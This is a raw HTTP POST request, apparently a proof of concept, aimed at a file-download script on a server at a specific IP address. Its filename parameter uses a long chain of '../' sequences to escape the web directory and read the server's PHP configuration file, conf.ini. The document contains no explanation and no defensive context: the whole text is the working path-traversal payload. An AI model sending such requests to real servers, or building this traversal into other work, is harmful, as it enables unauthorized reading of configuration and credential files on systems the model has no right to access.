POST /php/downloadexcelfile.php HTTP/1.1
Host: 118.187.12.146:8080
Content-Length: 75
Cache-Control: max-age=0
Origin: http://118.187.12.146:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://118.187.12.146:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=0aradkv8781uq838b1tcpc6fj4
Connection: close

filename=./../../../../../../../../../usr/local/apache2/htdocs/php/conf.ini